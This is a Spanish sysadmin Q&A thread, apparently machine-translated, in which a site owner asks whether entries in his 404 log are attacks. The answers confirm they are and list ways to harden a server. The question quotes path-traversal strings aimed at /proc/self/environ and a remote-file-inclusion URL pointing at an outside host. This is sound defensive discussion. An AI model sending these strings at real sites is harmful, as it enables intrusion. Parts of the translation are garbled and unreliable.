12 votos

¿es un intento de hackeo?

Mirando mis registros 404 me di cuenta de las siguientes dos URLs, ambas ocurrieron una vez:

/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ

y

/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00

La página en cuestión, library.php requiere una type variable con media docena de valores aceptables diferentes, y luego una id variable. Así, una URL válida podría ser

library.php?type=Circle-K&id=Strange-Things-Are-Afoot

y los identificadores se ejecutan todos a través de mysql_real_escape_string antes de ser utilizado para consultar la base de datos.

Soy un novato, pero me parece que ambos enlaces son simples ataques contra el webroot?

1) ¿Cuál es la mejor manera de protegerse contra este tipo de cosas además de un 404?

2) ¿Debo permear la(s) IP(s) responsable(s)?

EDITAR: también acaba de ver esto

/library.php=http://www.basfalt.no/scripts/danger.txt

EDITAR 2: La IP ofensiva de los 3 ataques fue 216.97.231.15 que se remonta a un ISP llamado Lunar Pages ubicado en las afueras de Los Ángeles.

EDITAR 3: He decidido llamar al ISP el viernes por la mañana, hora local, y discutir el problema con quienquiera que pueda ponerse al teléfono. Publicaré los resultados aquí en 24 horas más o menos.

EDITAR 4: Acabé enviando un correo electrónico a sus administradores y me respondieron primero que "estaban investigando" y un día después con "este problema debería estar resuelto ya". Lamentablemente, no hay más detalles.

19voto

TML Puntos 328

0) Sí. Como mínimo, se trata de un sondeo sistemático contra su sitio web para intentar descubrir si es vulnerable.

1) Aparte de asegurarte de que tu código está limpio, no hay mucho que puedas hacer más que ejecutar tus propias pruebas contra tu host para asegurarte de que es seguro. Google Skipfish es una de las muchas herramientas que te ayudarán a ello.

2) Lo haría.

7voto

Yanick Rochon Puntos 173

Esto es un ataque, está muy explicado aquí .

7voto

Janne Pikkarainen Puntos 22249

Como han dicho otros: sí, es un intento de pirateo. Por favor, ten en cuenta que además de este intento posiblemente hecho a mano, hay montones y montones de intentos automatizados dirigidos por botnets. Por lo general, este tipo de ataques intentan colarse a través de vulnerabilidades antiguas y/o algunos fallos de codificación típicos, como la falta de validación de la entrada del usuario que conduce a la inyección SQL, la fuga del sistema o de los archivos, o similares.

Prohibir esas redes de bots a mano es probablemente imposible, ya que las redes de bots pueden usar hasta miles de direcciones IP únicas, así que si quieres prohibirlas, tendrás que usar algún tipo de programa de prohibición automatizado. fail2ban me viene a la mente; hacer que reaccione a los eventos de mod_security o algunas otras entradas de registro.

Si tu código es limpio y el servidor está reforzado, esos intentos de hackeo son sólo una molesta contaminación del registro. Pero es mejor tomar medidas de precaución y considerar algunas o todas las siguientes, dependiendo de sus necesidades:

  • mod_seguridad es un módulo de Apache que filtra todo tipo de intentos típicos de hackeo. También puede restringir el tráfico saliente (la página que su servidor enviaría a un cliente) si ve JavaScript sospechoso, etc.

  • Suhosin para endurecer el propio PHP.

  • Ejecute sus scripts de PHP como un usuario que posea el scriptsscriptscripts; cosas como suphp y php-fpm lo hace posible.

  • Monta tu webroot y el directorio temporal de PHP como noexec,nosuid,nodev .

  • Desactivar las funciones PHP innecesarias, como sistema y pasar por .

  • Desactivar los módulos PHP innecesarios. Por ejemplo, si no necesita el soporte de IMAP, no lo habilite.

  • Mantenga su servidor actualizado.

  • Vigila los troncos.

  • Asegúrate de tener copias de seguridad.

  • Ten un plan sobre qué hacer si alguien te hackea o si te ocurre algún otro desastre.

Es un buen comienzo. Luego hay medidas aún más extremas como Esnifar y Preludio pero pueden ser muy exagerados para la mayoría de las configuraciones.

1voto

Chris Puntos 297

Es muy probable que la máquina que está haciendo esas consultas sea un zombi de la red de bots. Si estás recibiendo esas peticiones desde múltiples IPs, probablemente no merezca la pena prohibirlas, porque tendrías que prohibir la mitad de internet para que fuera efectivo.

1voto

Andreas Rehm Puntos 536

Como ya se ha dicho, es un intento de acceder al archivo /proc/self/environ para obtener más información.

Supongo que es una máquina linux:

Debe utilizar

Puedes bloquear la ip de un servidor atacante, pero debes considerar que puede ser no atacante en la función.

Yo acostumbro a bloquear algunos servicios cuando mi servidor es atacado: http/https/pop/imap/ssh pero dejo abierto el smtp, que puede ser notificado si ha cometido un error.

EnMiMaquinaFunciona.com

EnMiMaquinaFunciona es una comunidad de administradores de sistemas en la que puedes resolver tus problemas y dudas.
Puedes consultar las preguntas de otros sysadmin, hacer tus propias preguntas o resolver las de los demás.

Powered by: